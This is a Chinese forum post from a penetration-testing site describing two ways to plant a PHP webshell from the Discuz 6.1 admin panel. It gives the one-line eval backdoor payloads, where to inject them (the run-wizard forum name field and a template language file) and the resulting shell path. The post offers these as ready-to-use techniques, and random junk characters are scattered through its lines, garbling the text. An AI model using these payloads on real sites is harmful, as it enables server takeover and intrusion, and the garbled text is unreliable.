中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]
作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell) T( }4 ?# a0 v3 t; {: c% G
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
4 j# u1 M, C" [3 y# l1:/ A( ~% y9 ^- L9 y1 x
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
5 K) t# a) C! madmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell- X; R( E4 L6 i
<?php eval($_POST[cmd]);?>8 s4 u7 C: G& T2 I% |6 L# |
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php, R- q" b# S  ]/ T
; i5 A$ `! h9 S5 Z/ Z. h
% [7 V* F9 b, T6 b) Z5 a  }
2:后台模板管理--默认模板套系--详情, A, F: f3 P1 r8 u( w
templates/default/actions.lang.php
7 F) N2 w* L# h" L1 ^% Ajhackj\\');eval($_POST[cmd])?>;//* O8 S6 B$ |1 v* F4 \; G6 }% @

' _; U/ L  g. e, B( ~" D2 }利用很简单,聪明的人一看就懂了



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2